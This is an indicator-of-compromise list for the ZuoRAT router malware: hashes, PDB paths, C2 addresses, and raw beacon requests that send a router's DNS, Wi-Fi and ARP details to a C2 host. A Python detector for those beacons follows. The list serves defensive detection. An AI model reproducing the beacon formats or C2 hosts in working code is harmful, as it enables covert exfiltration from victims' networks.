ZuoRAT_IoCs.txt
PDB Paths
Test File
H:\JCQ\Test\Release\Test.pdb
Shellcode Loader Files
D:\c-code\c++\shellcode\移动\Release\sc2.pdb
D:\c-code\c++\shellcode\scopysss\Release\sc2.pdb
D:\c-code\c++\shellcode\scopysss-1\Release\sc2.pdb
D:\c-code\c++\shellcode\shellcode3\Release\sc3.pdb
D:\c-code\c++\shellcode\sxianchengcopy\Release\sc2.pdb
Injector Program
E:\code\wKillFrame\bin\x64\Release\Exec\Win64\inject_doc_cpp.pdb
CBeacon PDB Paths
D:\wuxian7\Desktop\CBeacon\x64\Release\BeaconTest.pdb
C:\Users\wuxian7\Desktop\CBeacon\x64\Release\BeaconExe.pdb
C:\JD\code\AutomaticRightsProtect\HijackCom\x64\Release\Hijack.pdb
Cobalt Strike
D:\c-code\c++\shellcode\sxianchengcopy--kehu\x64\Release\sc2.pdb
Com-Object Hijacking Program PDB Path
C:\JD\code\AutomaticRightsProtect\HijackCom\x64\Release\Hijack.pdb
Python-compiled exploitation scripts
7430b74cb4a374c0acbed1caf76cfe103d7b7861250b413602196d8dea00860f
9232382eebcb17f65fc1bfc4ae68b2bfe80ebacf9f962f4de650e9590910d04e
Extracted Python script from the executable with the malicious C2
a56e10f3a5be1ebd6716baa42699615fdc7270ce2986a1e79d041b7f44a2b71b
Router samples
asdfa.a – December 21, 2021
2f4359f91a92fa56d4aa0940ecb928042e20787b660c95e853e944ba92b02f17
Router sample – December 2020
3230ab2a8cd28ef9f463fabfb879df4ea00447605b18488d64e6fc12850371fc
Router C2 VPSs
141.98.212[.]62/asdfa.a
103.140.187[.]131
202.178.11[.]78
memthree[.]com
Windows loaders
bf34ad9b62472761393ac2de942dd95db8869d6996701cbefeb1f1b96ca18ac1
31ce9fd09c2a889fc9caf4309b0f6c8f45d9d7a7bf2d5fabdc988f478ef2d03e
71d0de00734ef06e0f528f3ef328d965788d2e312b767c0b0c8435ab7b8cfc10
ec059aaf18aca6da530e94c7e2d32f425007850b9054c3d204a2e842e36819f0
daaa12fb1dd3b637dd0e73c225e4ca55b47f2eddfda2fc0345a3fd2232276da9
1cbb9ed1b3be4a06ed0497aba34bdbb05b52f663502dce097d147b26ae84cff2
c2c6e542809952450c5ef0e47db354238e38c25ac8b0240f2b5e89616f899f0a
e5063f5d97defb7e9f544ef77024650201c43e37364068ddbc05f299b42a3d5e
d8110c26e4034182c2f6689ea25d742cfe9fbd59caba449c15fb437e88e6db46
7d45957ac07fca2e9558c06447102fde70ea17e54c4f6ed76303b08ca8bc830b
URLs
https://www.yuque.com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas&from=https%3A%2F%2Fwww.yuque.com%2Fdocs%2Fshare%2F6d9a855b-d656-4f7f-86d5-e346f8738aa3%3F%23%2520%25E3%2580%258A996icu%25E3%2580%258B
https://www.yuque.com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas?from=https%3A%2F%2Fwww.yuque.com%2Fdocs%2Fshare%2F6d9a855b-d656-4f7f-86d5-e346f8738aa3%3F%23%2520%25E3%2580%258A996icu%25E3%2580%258B
https://www.yuque[.]com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas&from=https://www.yuque.com/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?%23%20%E3%80%8AFuckYou%E3%80%8B
http://1.15.122[.]211/index2.html
CBeacon
938bfd8179aa43ab80753d96c2ec0e6cfdc728715e03bbb3b315f95b94bf8bc3
7d6cc68a317038eaf1a5a7b29e78ec520cac24a26980759dee036a46be4b7c3d
f9ca9a1b01f511eba0224fddb760886d8f5339bd5d4afcc6440525ec6ea90fd4
dfe1135dfcf06e4b906a97a9720dc83e41d3f1c80e93c637b94ffec927acae05
CBeacon C2s
https://service-1onwbsn4-1253943544[.]gz[.]apigw[.]tencentcs[.]com
http://82.157.69[.]219:443/api
GoBeacon
2f7ab4f79c6c0c2095d1964c414eb28c6e9513d6cfd1c01455c0c373d081290d
2918ebcbf06f5816d68ababd97c249ba3cf79d4bfab199761d6cfa40c10c1d60
Cobalt Strike
e29626e9cf755cc084adf9c08b0f6fd5750d86f5cfe580ca971c29c0110f590e
Cobalt Strike C2
110.42.185[.]232:8081/kGZQ
Files uploaded to VirusTotal by Submitter a159fa17
Python-compiled executables used for router exploitation:
• 7430b74cb4a374c0acbed1caf76cfe103d7b7861250b413602196d8dea00860f
• 9232382eebcb17f65fc1bfc4ae68b2bfe80ebacf9f962f4de650e9590910d04e
Decompiled Python script extracted from one of the Python executables above
• a56e10f3a5be1ebd6716baa42699615fdc7270ce2986a1e79d041b7f44a2b71b
Windows Loader Agent with debug string containing “JCQ”
• c2c6e542809952450c5ef0e47db354238e38c25ac8b0240f2b5e89616f899f0a
Text file of Hong Kong-based IP addresses
• c61b4b5c9f2e3d57c7b6f7471c9b869aa7a7c8d6e3b50c49ab51b09105e32340
Go agent that appears to be an IoT scanner
• 6c87397d545cc21046dbc1190048827634e23920c264c512c38bec6014c3584b
Network traffic associated with send_http_msg_php function:
"GET /dns.php?o_addr=%s&ip_addr=%s&dns=%s HTTP/1.1\r\nHost: 101.99.91.10\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\r\n\r\n"
"GET /ssid.php?o_addr=%s&i_ssid=%s&i_bssid=%s HTTP/1.1\r\nHost: 101.99.91.10\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\r\n\r\n"
"GET /arp.php?o_addr=%s&int_ip=%s&int_mac=%s HTTP/1.1\r\nHost: 101.99.91.10\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\r\n\r\n"
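Added detection example (not part of the ZuoRAT IoC file or its source research): a small matcher that takes raw HTTP/1.x requests, as a proxy or IDS would log them, and flags the three send_http_msg_php beacon shapes listed above by endpoint, exact parameter set and Host header. The C2 host 101.99.91.10 and the endpoint/parameter names come from the IoC list; the sample requests, the field values in them and the "high"/"weak" confidence labels are constructed for this example.

```python
"""Flag HTTP requests matching the ZuoRAT send_http_msg_php beacon format.

Added example for the IoC list above; the host and endpoint/parameter
names are taken from the list, everything else here is constructed.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# C2 host and beacon endpoints exactly as listed in the IoC file.
C2_HOST = "101.99.91.10"
BEACON_PARAMS = {
    "/dns.php": {"o_addr", "ip_addr", "dns"},
    "/ssid.php": {"o_addr", "i_ssid", "i_bssid"},
    "/arp.php": {"o_addr", "int_ip", "int_mac"},
}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")


def parse_http_request(raw: bytes) -> Optional[dict]:
    """Parse a CRLF-delimited HTTP/1.x request head into method, path,
    query parameters and lower-cased headers. Returns None when the
    request line is malformed."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(m.group("target"))
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"method": m.group("method"), "path": parts.path,
            "query": query, "headers": headers}


def classify_beacon(raw: bytes) -> Optional[dict]:
    """Return a verdict if `raw` matches one of the three beacon shapes,
    else None. Path plus exact parameter set is the match; the Host
    header only sets confidence, so a beacon pointed at a different
    C2 host is still reported (as 'weak') rather than missed."""
    req = parse_http_request(raw)
    if req is None or req["method"] != "GET":
        return None
    expected = BEACON_PARAMS.get(req["path"])
    if expected is None or set(req["query"]) != expected:
        return None
    host = req["headers"].get("host", "").split(":")[0]
    return {"endpoint": req["path"], "fields": req["query"], "host": host,
            "confidence": "high" if host == C2_HOST else "weak"}


# Constructed sample traffic (not real captures): one request per beacon
# endpoint, one beacon aimed at a non-listed host, and one benign request.
SAMPLES = [
    b"GET /dns.php?o_addr=203.0.113.5&ip_addr=192.168.1.1&dns=192.168.1.1 HTTP/1.1\r\n"
    b"Host: 101.99.91.10\r\nConnection: keep-alive\r\n\r\n",
    b"GET /ssid.php?o_addr=203.0.113.5&i_ssid=HomeWiFi&i_bssid=00:11:22:33:44:55 HTTP/1.1\r\n"
    b"Host: 101.99.91.10\r\n\r\n",
    b"GET /arp.php?o_addr=203.0.113.5&int_ip=192.168.1.20&int_mac=aa:bb:cc:dd:ee:ff HTTP/1.1\r\n"
    b"Host: 198.51.100.7\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
]


def scan_samples() -> list:
    """Run the classifier over SAMPLES and return only the hits."""
    return [v for v in (classify_beacon(s) for s in SAMPLES) if v is not None]


if __name__ == "__main__":
    for verdict in scan_samples():
        print(verdict)
```

The exact-parameter-set check is deliberate: the beacon always sends the same three fields per endpoint, so a request to `/dns.php` with extra or missing parameters is more likely an unrelated web application than this implant. Run it over real proxy or IDS request logs by feeding each reconstructed request to `classify_beacon`.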